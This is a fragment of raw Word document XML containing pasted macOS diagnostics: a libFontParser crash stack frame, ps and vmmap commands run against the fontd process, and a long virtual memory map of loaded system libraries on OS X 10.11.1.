          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">4   libFontParser.dylib           </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41154">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x00007fff910882a0 TConcreteFontScaler::GetFontInfo(FPFontInfo*) const + 48</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F41154" w:rsidRDefault="00F41154" w:rsidP="001373F2"/>
    <w:p w:rsidR="00677E6F" w:rsidRPr="00677E6F" w:rsidRDefault="00677E6F" w:rsidP="001373F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>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h-3.2# ps -ef| grep f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501   254     1   0  7:52PM ??         0:01.11 /System/Library/Frameworks/ApplicationServices.framework/Frameworks/ATS.framework/Support/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0   756   685   0 10:36PM ttys000    0:00.00 grep f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h-3.2# vmmap 25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Process:         fontd [25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Path:            /System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/ATS.framework/Versions/A/Support/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Load Address:    0x1052110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Identifier:      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Version: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Code Type:       X86-6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Parent Process:  launchd [1]</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Date/Time:       2015-12-03 22:36:21.580 +08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Launch Time:     2015-12-03 19:52:11.974 +08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OS Version:      Mac OS X 10.11.1 (15B42)</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Report Version:  7</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nalysis Tool:   /Applications/Xcode.app/Contents/Developer/usr/bin/vmmap</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nalysis Tool Version:  Xcode 7.0.1 (7A1001)</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Virtual Memory Map of process 254 (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Output report format:  2.4  -- 64-bit proces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VM page size:  4096 byt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Non-writable regions for process 25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REGION TYPE                      START - END             [ VSIZE] PRT/MAX SHRMOD  REGION DETAI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TEXT                 0000000105211000-0000000105215000 [   16K] r-x/rwx </w:t>
      </w:r>
      <w:r w:rsidRPr="00677E6F">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SM=COW  ...es.framework/Versions/A/Frameworks/ATS.framework/Versions/A/Support/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LINKEDIT             0000000105216000-0000000105219000 [   12K] r--/rwx SM=COW  ...es.framework/Versions/A/Frameworks/ATS.framework/Versions/A/Support/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21a000-000000010521b000 [    4K] r--/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21c000-000000010521d000 [    4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232000-0000000105234000 [    8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249000-000000010524a000 [    4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24a000-000000010524b000 [    4K] r--/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00010544b000-000000010544c000 [    4K] r--/rw-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44c000-000000010544d000 [    4K] r--/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44e000-000000010544f000 [    4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464000-0000000105466000 [    8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000000010547b000-000000010547c000 [    4K] ---/rwx SM=NUL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000105480000-0000000105484000 [   16K] r--/rw-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0001054ad000-00000001054f6000 [  292K] r--/r--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pped file            0000000105e00000-0000000107711000 [ 25.1M] r--/r-x SM=ALI  /usr/share/icu/icudt55l.da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TACK GUARD            0000700000000000-0000700000001000 [    4K] ---/rwx SM=NUL  stack guard for thread 1</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TACK GUARD            00007fff569ef000-00007fff5a1ef000 [ 56.0M] ---/rwx SM=NUL  stack guard for thread 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69f48000-00007fff69f7f000 [  220K] r-x/rwx SM=COW  /usr/lib/dyl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LINKEDIT             00007fff69fbb000-00007fff69fd0000 [   84K] r--/rwx SM=COW  /usr/lib/dyl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7cb000-00007fff84873000 [  672K] r-x/r-x SM=COW  .../PrivateFrameworks/LanguageModeling.framework/Versions/A/LanguageModeling</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873000-00007fff8496f000 [ 1008K] r-x/r-x SM=COW  ...sions/A/Frameworks/ATS.framework/Versions/A/Resources/libFontPars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96f000-00007fff84a5f000 [  960K] r-x/r-x SM=COW  /usr/lib/libxml2.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a5f000-00007fff84a62000 [   12K] r-x/r-x SM=COW  ...brary/Frameworks/ImageIO.framework/Versions/A/Resources/libRadian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a62000-00007fff84aa5000 [  268K] r-x/r-x SM=COW  /System/Library/Frameworks/Metal.framework/Versions/A/Met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aa5000-00007fff84aa7000 [    8K] r-x/r-x SM=COW  /usr/lib/liblangi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aa7000-00007fff84aa8000 [    4K] r-x/r-x SM=COW  /usr/lib/system/libkeymg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aa8000-00007fff84d8e000 [ 2968K] r-x/r-x SM=COW  ...ramework/Versions/A/Frameworks/CarbonCore.framework/Versions/A/CarbonCor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4d8e000-00007fff84dab000 [  116K] r-x/r-x SM=COW  /usr/lib/libexten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47e000-00007fff85487000 [   36K] r-x/r-x SM=COW  ...A/Frameworks/ATS.framework/Versions/A/Resources/libFontWorkerAcces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654000-00007fff856a6000 [  328K] r-x/r-x SM=COW  /System/Library/Frameworks/CoreAudio.framework/Versions/A/CoreAudi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739000-00007fff8573c000 [   12K] r-x/r-x SM=COW  ...ameworks/OpenGL.framework/Versions/A/Libraries/libCVMSPluginSuppor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7b4000-00007fff857b9000 [   20K] r-x/r-x SM=COW  ...em/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libGIF.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TEXT                 00007fff85baf000-00007fff85bb8000 [   36K] r-x/r-x SM=COW  ...brary/Frameworks/OpenGL.framework/Versions/A/Libraries/libGFXShare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cea000-00007fff85d36000 [  304K] r-x/r-x SM=COW  ....framework/Versions/A/Frameworks/PrintCore.framework/Versions/A/PrintCor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eab000-00007fff85eb7000 [   48K] r-x/r-x SM=COW  /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libG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5ee1000-00007fff8600e000 [ 1204K] r-x/r-x SM=COW  /System/Library/Frameworks/CoreText.framework/Versions/A/CoreTex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042000-00007fff86072000 [  192K] r-x/r-x SM=COW  /usr/lib/system/libsystem_m.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07a000-00007fff86086000 [   48K] r-x/r-x SM=COW  /usr/lib/system/libkxl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089000-00007fff86092000 [   36K] r-x/r-x SM=COW  /System/Library/Frameworks/NetFS.framework/Versions/A/NetF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0d2000-00007fff861c3000 [  964K] r-x/r-x SM=COW  ...em/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libJP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ed1000-00007fff86ee3000 [   72K] r-x/r-x SM=COW  ...ork/Versions/A/Frameworks/vecLib.framework/Versions/A/libSparseBLA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ee3000-00007fff86f29000 [  280K] r-x/r-x SM=COW  ...ons/A/Frameworks/ATS.framework/Versions/A/Resources/libFontRegistry.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6f5a000-00007fff881ab000 [ 18.3M] r-x/r-x SM=COW  /System/Library/Frameworks/CoreGraphics.framework/Versions/A/CoreGraphic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517000-00007fff8851a000 [   12K] r-x/r-x SM=COW  ...brary/Frameworks/ServiceManagement.framework/Versions/A/ServiceManagemen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51a000-00007fff8851d000 [   12K] r-x/r-x SM=COW  ...work/Versions/A/Frameworks/loginsupport.framework/Versions/A/loginsuppor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51d000-00007fff887c4000 [ 2716K] r-x/r-x SM=COW  /System/Library/Frameworks/CoreData.framework/Versions/A/CoreDat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819000-00007fff88843000 [  168K] r-x/r-x SM=COW  /usr/lib/system/libsystem_inf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843000-00007fff888b7000 [  464K] r-x/r-x SM=COW  /System/Library/Frameworks/IOKit.framework/Versions/A/IOKi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8bd000-00007fff888e7000 [  168K] r-x/r-x SM=COW  /usr/lib/system/libxp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9e2000-00007fff889e9000 [   28K] r-x/r-x SM=COW  ...ibrary/PrivateFrameworks/IOAccelerator.framework/Versions/A/IOAccelerator</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9e9000-00007fff889ea000 [    4K] r-x/r-x SM=COW  ...y/Frameworks/ApplicationServices.framework/Versions/A/Application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9ea000-00007fff88a02000 [   96K] r-x/r-x SM=COW  /usr/lib/system/libsystem_as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a7a000-00007fff88a7b000 [    4K] r-x/r-x SM=COW  /usr/lib/libenergytra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8be0000-00007fff88f44000 [ 3472K] r-x/r-x SM=COW  /usr/lib/libobjc.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TEXT                 00007fff88f44000-00007fff8906a000 [ 1176K] r-x/r-x </w:t>
      </w:r>
      <w:r w:rsidRPr="00677E6F">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SM=COW  .../Versions/A/Frameworks/LaunchServices.framework/Versions/A/Launch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087000-00007fff89094000 [   52K] r-x/r-x SM=COW  /System/Library/Frameworks/OpenDirectory.framework/Versions/A/OpenDirector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094000-00007fff8909e000 [   40K] r-x/r-x SM=COW  /usr/lib/system/libsystem_pthrea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09f000-00007fff89136000 [  604K] r-x/r-x SM=COW  ....framework/Versions/A/Frameworks/ColorSync.framework/Versions/A/ColorSync</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142000-00007fff89143000 [    4K] r-x/r-x SM=COW  ...lerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/vec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526000-00007fff8959a000 [  464K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/Heimdal.framework/Versions/A/Heimd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72f000-00007fff8975d000 [  184K] r-x/r-x SM=COW  /usr/lib/system/libdispatch.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a6c000-00007fff89a7e000 [   72K] r-x/r-x SM=COW  /usr/lib/system/libsystem_tra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d6e000-00007fff89f14000 [ 1688K] r-x/r-x SM=COW  /System/Library/Frameworks/AudioToolbox.framework/Versions/A/AudioToolbox</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f2b000-00007fff89f5a000 [  188K] r-x/r-x SM=COW  ...Frameworks/CoreServicesInternal.framework/Versions/A/CoreServicesIntern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9ffb000-00007fff8a092000 [  604K] r-x/r-x SM=COW  ...rsions/A/Frameworks/ATS.framework/Versions/A/Resources/libATSServ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a1a9000-00007fff8a221000 [  480K] r-x/r-x SM=COW  /usr/lib/system/libcorecryp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a221000-00007fff8a230000 [   60K] r-x/r-x SM=COW  /usr/lib/libxar.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aac3000-00007fff8aad4000 [   68K] r-x/r-x SM=COW  /usr/lib/libbsm.0.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ae22000-00007fff8ae31000 [   60K] r-x/r-x SM=COW  /System/Library/Frameworks/OpenGL.framework/Versions/A/OpenG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b1dc000-00007fff8b20e000 [  200K] r-x/r-x SM=COW  /System/Library/Frameworks/GSS.framework/Versions/A/GS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c7ee000-00007fff8c80b000 [  116K] r-x/r-x SM=COW  /usr/lib/libresolv.9.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c818000-00007fff8cb6d000 [ 3412K] r-x/r-x SM=COW  /System/Library/Frameworks/Foundation.framework/Versions/C/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cb84000-00007fff8cbae000 [  168K] r-x/r-x SM=COW  /usr/lib/libxslt.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ceff000-00007fff8cf08000 [   36K] r-x/r-x SM=COW  /usr/lib/system/libsystem_dnss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d331000-00007fff8d336000 [   20K] r-x/r-x SM=COW  /usr/lib/system/libcach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d336000-00007fff8d350000 [  104K] r-x/r-x SM=COW  ...ersions/A/Frameworks/CFOpenDirectory.framework/Versions/A/CFOpenDirector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d350000-00007fff8d4b8000 [ 1440K] r-x/r-x SM=COW  ...framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libBLA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ea69000-00007fff8eaa8000 [  252K] r-x/r-x SM=COW  ...Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libGLImag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ef55000-00007fff8ef7f000 [  168K] r-x/r-x SM=COW  /usr/lib/libc++abi.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TEXT                 00007fff8f6d8000-00007fff8f71a000 [  264K] r-x/r-x SM=COW  ...tem/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libGLU.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f71a000-00007fff8fb90000 [ 4568K] r-x/r-x SM=COW  ...tem/Library/Frameworks/CoreFoundation.framework/Versions/A/Core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8fe4d000-00007fff8fe7e000 [  196K] r-x/r-x SM=COW  /usr/lib/libsandbox.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068e000-00007fff90691000 [   12K] r-x/r-x SM=COW  /usr/lib/system/libquarantin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0a96000-00007fff90af3000 [  372K] r-x/r-x SM=COW  ...m/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libTIFF.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0e0f000-00007fff90e35000 [  152K] r-x/r-x SM=COW  ...em/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libPng.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0e41000-00007fff90e53000 [   72K] r-x/r-x SM=COW  /usr/lib/libz.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15bc000-00007fff9162c000 [  448K] r-x/r-x SM=COW  ....framework/Versions/A/Frameworks/SearchKit.framework/Versions/A/SearchKi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1692000-00007fff916a4000 [   72K] r-x/r-x SM=COW  /usr/lib/libcmph.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1c86000-00007fff91f06000 [ 2560K] r-x/r-x SM=COW  /System/Library/Frameworks/Security.framework/Versions/A/Securit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1f06000-00007fff91f2b000 [  148K] r-x/r-x SM=COW  ...m/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libJPEG.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1f2b000-00007fff91f31000 [   24K] r-x/r-x SM=COW  ...m/Library/Frameworks/DiskArbitration.framework/Versions/A/DiskArbitr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334000-00007fff92351000 [  116K] r-x/r-x SM=COW  /usr/lib/system/libsystem_mallo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361000-00007fff923c0000 [  380K] r-x/r-x SM=COW  ...y/Frameworks/SystemConfiguration.framework/Versions/A/SystemConfigur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3c0000-00007fff92435000 [  468K] r-x/r-x SM=COW  ...ary/Frameworks/SecurityFoundation.framework/Versions/A/Security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39000-00007fff9244e000 [   84K] r-x/r-x SM=COW  /usr/lib/system/libsystem_coretl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4e000-00007fff92465000 [   92K] r-x/r-x SM=COW  .../Versions/A/Frameworks/vecLib.framework/Versions/A/libLinearAlgebr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65000-00007fff924ab000 [  280K] r-x/r-x SM=COW  .../Versions/A/Frameworks/SharedFileList.framework/Versions/A/SharedFileLis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d9000-00007fff924da000 [    4K] r-x/r-x SM=COW  /System/Library/Frameworks/CoreServices.framework/Versions/A/Core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da000-00007fff924ff000 [  148K] r-x/r-x SM=COW  ...rivateFrameworks/MultitouchSupport.framework/Versions/A/MultitouchSuppor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4ff000-00007fff92501000 [    8K] r-x/r-x SM=COW  /usr/lib/system/libsystem_secini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509000-00007fff92528000 [  124K] r-x/r-x SM=COW  /usr/lib/system/libsystem_kerne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600000-00007fff9266f000 [  444K] r-x/r-x SM=COW  ...tionServices.framework/Versions/A/Frameworks/ATS.framework/Versions/A/AT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720000-00007fff92729000 [   36K] r-x/r-x SM=COW  /usr/lib/libMatch.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TEXT                 00007fff92917000-00007fff9291b000 [   16K] r-x/r-x SM=COW  /System/Library/Frameworks/IOSurface.framework/Versions/A/IOSurfac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921000-00007fff92922000 [    4K] r-x/r-x SM=COW  /System/Library/Frameworks/Accelerate.framework/Versions/A/Accelerat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927000-00007fff92986000 [  380K] r-x/r-x SM=COW  /usr/lib/system/libsystem_network.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9ba000-00007fff929c3000 [   36K] r-x/r-x SM=COW  /usr/lib/system/libcopyfil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9c3000-00007fff929c9000 [   24K] r-x/r-x SM=COW  /usr/lib/system/libmach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9c9000-00007fff929e5000 [  112K] r-x/r-x SM=COW  /usr/lib/libCRFSuit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a08000-00007fff92afb000 [  972K] r-x/r-x SM=COW  /usr/lib/libiconv.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b08000-00007fff92b0c000 [   16K] r-x/r-x SM=COW  ...ry/Frameworks/OpenGL.framework/Versions/A/Libraries/libCoreVMClien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b8d000-00007fff92b8f000 [    8K] r-x/r-x SM=COW  /usr/lib/system/libremovefil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b8f000-00007fff92bbb000 [  176K] r-x/r-x SM=COW  /usr/lib/libarchive.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bc6000-00007fff92bf5000 [  188K] r-x/r-x SM=COW  ...s/A/Frameworks/DictionaryServices.framework/Versions/A/Dictionary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2f1f000-00007fff92f38000 [  100K] r-x/r-x SM=COW  /usr/lib/libcompres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1f7000-00007fff9347f000 [ 2592K] r-x/r-x SM=COW  /System/Library/Frameworks/CFNetwork.framework/Versions/A/CFNetwork</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47f000-00007fff934c6000 [  284K] r-x/r-x SM=COW  /usr/lib/libau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4c6000-00007fff934ca000 [   16K] r-x/r-x SM=COW  /usr/lib/system/libdyl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a32000-00007fff93a36000 [   16K] r-x/r-x SM=COW  ...ary/Frameworks/OpenGL.framework/Versions/A/Libraries/libCoreFSCach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b82000-00007fff93be0000 [  376K] r-x/r-x SM=COW  ...ramework/Versions/A/Frameworks/OSServices.framework/Versions/A/OS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c0f000-00007fff93c10000 [    4K] r-x/r-x SM=COW  /usr/lib/libOpenScriptingUti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c10000-00007fff93c1c000 [   48K] r-x/r-x SM=COW  /usr/lib/system/libcommonCryp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c1f000-00007fff93e2d000 [ 2104K] r-x/r-x SM=COW  /usr/lib/libicucore.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e95000-00007fff93ed0000 [  236K] r-x/r-x SM=COW  ...cationServices.framework/Versions/A/Frameworks/QD.framework/Versions/A/Q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3ed0000-00007fff93ed9000 [   36K] r-x/r-x SM=COW  /usr/lib/system/libsystem_networkexten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0a4000-00007fff940b3000 [   60K] r-x/r-x SM=COW  /usr/lib/libbz2.1.0.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330000-00007fff94384000 [  336K] r-x/r-x SM=COW  /usr/lib/libc++.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6e9000-00007fff9480e000 [ 1172K] r-x/r-x SM=COW  /usr/lib/libsqlite3.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936000-00007fff94939000 [   12K] r-x/r-x SM=COW  /usr/lib/system/libsystem_coreservice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TEXT                 00007fff949db000-00007fff94a8c000 [  708K] r-x/r-x SM=COW  ...ramework/Versions/A/Frameworks/vecLib.framework/Versions/A/libvMis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c19000-00007fff94c66000 [  308K] r-x/r-x SM=COW  ...ramework/Versions/A/Frameworks/HIServices.framework/Versions/A/HI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c87000-00007fff94d28000 [  644K] r-x/r-x SM=COW  ...es.framework/Versions/A/Frameworks/Metadata.framework/Versions/A/Metadat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d28000-00007fff94d7e000 [  344K] r-x/r-x SM=COW  ...s/CoreServices.framework/Versions/A/Frameworks/AE.framework/Versions/A/A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d7e000-00007fff94d96000 [   96K] r-x/r-x SM=COW  /usr/lib/libmaris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4d96000-00007fff94d9f000 [   36K] r-x/r-x SM=COW  ...es.framework/Versions/A/Frameworks/FSEvents.framework/Versions/A/FSEvent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5c07000-00007fff95c11000 [   40K] r-x/r-x SM=COW  /usr/lib/system/libsystem_notify.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5c46000-00007fff95c51000 [   44K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/NetAuth.framework/Versions/A/NetAuth</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5c51000-00007fff95c5a000 [   36K] r-x/r-x SM=COW  /usr/lib/system/libsystem_platform.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5c6a000-00007fff95c88000 [  120K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/AppleVPA.framework/Versions/A/AppleVP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04b000-00007fff96053000 [   32K] r-x/r-x SM=COW  /usr/lib/system/libcompiler_r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11e000-00007fff964b4000 [ 3672K] r-x/r-x SM=COW  ...lerate.framework/Versions/A/Frameworks/vImage.framework/Versions/A/vImag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4dd000-00007fff964f8000 [  108K] r-x/r-x SM=COW  /System/Library/Frameworks/Kerberos.framework/Versions/A/Kerbero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524000-00007fff96921000 [ 4084K] r-x/r-x SM=COW  ...amework/Versions/A/Frameworks/vecLib.framework/Versions/A/libLAPACK.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a92000-00007fff96a93000 [    4K] r-x/r-x SM=COW  /usr/lib/system/liblaunch.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6a99000-00007fff96ab4000 [  108K] r-x/r-x SM=COW  /usr/lib/liblzma.5.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9bd000-00007fff97acd000 [ 1088K] r-x/r-x SM=COW  ...framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libvDSP.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bab000-00007fff97c39000 [  568K] r-x/r-x SM=COW  /usr/lib/system/libsystem_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c39000-00007fff97cc7000 [  568K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/AppleJPEG.framework/Versions/A/AppleJPEG</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cc7000-00007fff97cc8000 [    4K] r-x/r-x SM=COW  .../Library/PrivateFrameworks/GPUCompiler.framework/libmetal_timestamp.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d8a000-00007fff97ddb000 [  324K] r-x/r-x SM=COW  /usr/lib/libcups.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e47000-00007fff97e57000 [   64K] r-x/r-x SM=COW  ...work/Versions/A/Frameworks/LangAnalysis.framework/Versions/A/LangAnalysi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7e57000-00007fff97e5b000 [   16K] r-x/r-x SM=COW  /usr/lib/system/libsystem_sandbox.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TEXT                 00007fff985f6000-00007fff985f9000 [   12K] r-x/r-x SM=COW  </w:t>
      </w:r>
      <w:r w:rsidRPr="00677E6F">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>/usr/lib/system/libsystem_configurat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85f9000-00007fff985fe000 [   20K] r-x/r-x SM=COW  /usr/lib/libpam.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26f000-00007fff99275000 [   24K] r-x/r-x SM=COW  /usr/lib/libheimdal-asn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5f1000-00007fff99626000 [  212K] r-x/r-x SM=COW  /System/Library/Frameworks/CoreVideo.framework/Versions/A/CoreVide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626000-00007fff99627000 [    4K] r-x/r-x SM=COW  /usr/lib/system/libun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98b000-00007fff9998d000 [    8K] r-x/r-x SM=COW  /usr/lib/system/libsystem_block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9e5000-00007fff999e7000 [    8K] r-x/r-x SM=COW  /usr/lib/libSystem.B.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d16000-00007fff99d18000 [    8K] r-x/r-x SM=COW  /usr/lib/libDiagnosticMessagesClien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9db9000-00007fff9a04f000 [ 2648K] r-x/r-x SM=COW  /usr/lib/libmecabr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072000-00007fff9a078000 [   24K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/TCC.framework/Versions/A/TCC</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0cb000-00007fff9a0d1000 [   24K] r-x/r-x SM=COW  /usr/lib/system/libunwin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130000-00007fff9a2f7000 [ 1820K] r-x/r-x SM=COW  /System/Library/Frameworks/ImageIO.framework/Versions/A/ImageI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ac8000-00007fff9aad4000 [   48K] r-x/r-x SM=COW  /usr/lib/libChineseTokeniz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d6f000-00007fff9adbd000 [  312K] r-x/r-x SM=COW  ...Frameworks/ATS.framework/Versions/A/Resources/libFontRegistryServ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dce000-00007fff9add8000 [   40K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/CommonAuth.framework/Versions/A/CommonAuth</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TEXT                 00007fff9add8000-00007fff9ade5000 [   52K] r-x/r-x SM=COW  ...ersions/A/Frameworks/SpeechSynthesis.framework/Versions/A/SpeechSynthesi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UNICODE              00007fff9ade5000-00007fff9ae6f000 [  552K] r--/r-- SM=COW  ...tem/Library/Frameworks/CoreFoundation.framework/Versions/A/Core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LINKEDIT             00007fff9b17a000-00007fffa0c5b000 [ 90.9M] r--/r-- SM=COW  dyld shared cache combined __LINKEDI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7fffffe00000-00007fffffe01000 [    4K] r--/r--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7fffffe9c000-00007fffffe9d000 [    4K] r-x/r-x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Writable regions for process 25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REGION TYPE                      START - END             [ VSIZE] PRT/MAX SHRMOD  REGION DETAI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000105215000-0000000105216000 [    4K] rw-/rwx SM=COW  ...es.framework/Versions/A/Frameworks/ATS.framework/Versions/A/Support/font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Kernel Alloc Once      0000000105219000-000000010521a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21b000-000000010521c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21d000-0000000105232000 [   8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234000-0000000105249000 [   8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 xml:space="preserve">Activity Tracing       000000010524b000-000000010544b000 [ 2048K] rw-/rwx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44d000-000000010544e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44f000-0000000105464000 [   8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0000000105466000-000000010547b000 [   8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VM_ALLOCATE            000000010547c000-0000000105480000 [   16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QLite page cache      0000000105484000-00000001054a4000 [  12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pped file            00000001054a4000-00000001054ac000 [   32K] rw-/rwx SM=PRV  ...tx611tb28kv27w07st6r0000gn/C/com.apple.FontRegistry/fontregistry.user-shm</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00000001054ac000-00000001054ad000 [    4K] rw-/rw- SM=SHM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4f6000-0000000105512000 [  112K] rw-/rwx SM=ZER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13000-0000000105515000 [    8K] rw-/rwx SM=ZER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emory Tag 88          0000000105517000-0000000105518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QLite page cache      000000010551c000-000000010553c000 [  12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3c000-000000010553f000 [   12K] rw-/rwx SM=ZER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44000-0000000105547000 [   12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47000-0000000105548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48000-0000000105549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49000-000000010554a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4a000-000000010554b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59000-000000010555b000 [    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5b000-000000010555e000 [   12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5e000-000000010555f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5f000-0000000105560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60000-0000000105561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61000-0000000105562000 [    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62000-0000000105565000 [   12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78000-000000010557a000 [    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7a000-0000000105582000 [   32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82000-0000000105585000 [   12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85000-000000010558b000 [   2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8b000-000000010558c000 [    4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8c000-000000010558e000 [    8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8e000-0000000105590000 [    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90000-0000000105593000 [   12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93000-0000000105596000 [   12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a5000-00000001055a7000 [    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a7000-00000001055c6000 [  124K] rw-/rwx SM=COW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55c6000-00000001055c8000 [    8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TS (font support) (re 00000001055c8000-00000001055c9000 [    4K] rw-/rwx SM=NUL  reserved VM address space (unallocate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Dispatch continuations 0000000105600000-0000000105e00000 [ 8192K]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0000000107711000-0000000109691000 [ 31.5M] rw-/rwx SM=PRV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tack                  0000700000001000-0000700000013000 [   72K] rw-/rwx SM=PRV  thread 1</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_TINY            00007feaa0400000-00007feaa0800000 [ 4096K] rw-/rwx SM=COW  </w:t>
      </w:r>
      <w:r w:rsidRPr="00677E6F">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>DefaultMallocZone_0x10521a0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LLOC_SMALL           00007feaa0800000-00007feaa2800000 [ 32.0M] rw-/rwx SM=COW  DefaultMallocZone_0x10521a0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Stack                  00007fff5a1ef000-00007fff5a9ef000 [ 8192K] rw-/rwx SM=PRV  thread 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69f7f000-00007fff69f82000 [   12K] rw-/rwx SM=COW  /usr/lib/dyl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69f82000-00007fff69fbb000 [  228K] rw-/rwx SM=PRV  /usr/lib/dyl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4b000-00007fff74752000 [   28K] rw-/rwx SM=COW  .../PrivateFrameworks/LanguageModeling.framework/Versions/A/LanguageModeling</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52000-00007fff74793000 [  260K] rw-/rwx SM=COW  ...sions/A/Frameworks/ATS.framework/Versions/A/Resources/libFontPars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93000-00007fff7479e000 [   44K] rw-/rwx SM=COW  /usr/lib/libxml2.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9e000-00007fff7479f000 [    4K] rw-/rwx SM=COW  ...brary/Frameworks/ImageIO.framework/Versions/A/Resources/libRadian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9f000-00007fff747bf000 [  128K] rw-/rwx SM=COW  /System/Library/Frameworks/Metal.framework/Versions/A/Met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bf000-00007fff747c0000 [    4K] rw-/rwx SM=COW  /usr/lib/liblangi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c0000-00007fff747c1000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libkeymg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c1000-00007fff747d6000 [   84K] rw-/rwx SM=COW  ...ramework/Versions/A/Frameworks/CarbonCore.framework/Versions/A/CarbonCor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7d6000-00007fff747df000 [   36K] rw-/rwx SM=COW  /usr/lib/libexten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8e1000-00007fff748e2000 [    4K] rw-/rw- SM=COW  ...A/Frameworks/ATS.framework/Versions/A/Resources/libFontWorkerAcces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05000-00007fff74908000 [   12K] rw-/rw- SM=COW  /System/Library/Frameworks/CoreAudio.framework/Versions/A/CoreAudi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2c000-00007fff7492d000 [    4K] rw-/rw- SM=COW  ...ameworks/OpenGL.framework/Versions/A/Libraries/libCVMSPluginSuppor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5e000-00007fff7495f000 [    4K] rw-/rw- SM=COW  ...em/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libGIF.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6d000-00007fff7496e000 [    4K] rw-/rw- SM=COW  ...brary/Frameworks/OpenGL.framework/Versions/A/Libraries/libGFXShare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b2000-00007fff749b9000 [   28K] rw-/rw- SM=COW  ....framework/Versions/A/Frameworks/PrintCore.framework/Versions/A/PrintCor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9fc000-00007fff749fd000 [    4K] rw-/rw- SM=COW  /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libG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a0a000-00007fff74a2c000 [  136K] rw-/rwx SM=COW  /System/Library/Frameworks/CoreText.framework/Versions/A/CoreTex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a43000-00007fff74a44000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libsystem_m.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a46000-00007fff74a47000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libkxl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a48000-00007fff74a49000 [    4K] rw-/rwx SM=COW  /System/Library/Frameworks/NetFS.framework/Versions/A/NetF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DATA                 00007fff74a4e000-00007fff74a52000 [   16K] rw-/rwx SM=COW  ...em/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libJP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bc6000-00007fff74bc7000 [    4K] rw-/rwx SM=COW  ...ork/Versions/A/Frameworks/vecLib.framework/Versions/A/libSparseBLA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bc7000-00007fff74bce000 [   28K] rw-/rwx SM=COW  ...ons/A/Frameworks/ATS.framework/Versions/A/Resources/libFontRegistry.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bd9000-00007fff74c28000 [  316K] rw-/rwx SM=COW  /System/Library/Frameworks/CoreGraphics.framework/Versions/A/CoreGraphic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c6a000-00007fff74c6b000 [    4K] rw-/rwx SM=COW  ...brary/Frameworks/ServiceManagement.framework/Versions/A/ServiceManagemen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c6b000-00007fff74c6c000 [    4K] rw-/rwx SM=COW  ...work/Versions/A/Frameworks/loginsupport.framework/Versions/A/loginsuppor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c6c000-00007fff74cdf000 [  460K] rw-/rwx SM=COW  /System/Library/Frameworks/CoreData.framework/Versions/A/CoreDat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cf5000-00007fff74cf8000 [   12K] rw-/rwx SM=COW  /usr/lib/system/libsystem_inf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cf8000-00007fff74d01000 [   36K] rw-/rwx SM=COW  /System/Library/Frameworks/IOKit.framework/Versions/A/IOKi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d04000-00007fff74d0a000 [   24K] rw-/rwx SM=COW  /usr/lib/system/libxp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d5a000-00007fff74d5b000 [    4K] rw-/rwx SM=COW  ...ibrary/PrivateFrameworks/IOAccelerator.framework/Versions/A/IOAccelerator</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d5b000-00007fff74d5d000 [    8K] rw-/rwx SM=COW  /usr/lib/system/libsystem_as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d7d000-00007fff74d7e000 [    4K] rw-/rwx SM=COW  /usr/lib/libenergytra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d96000-00007fff74e57000 [  772K] rw-/rwx SM=COW  /usr/lib/libobjc.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e57000-00007fff74e7f000 [  160K] rw-/rwx SM=COW  .../Versions/A/Frameworks/LaunchServices.framework/Versions/A/Launch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e89000-00007fff74e8f000 [   24K] rw-/rwx SM=COW  /System/Library/Frameworks/OpenDirectory.framework/Versions/A/OpenDirector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e8f000-00007fff74e95000 [   24K] rw-/rwx 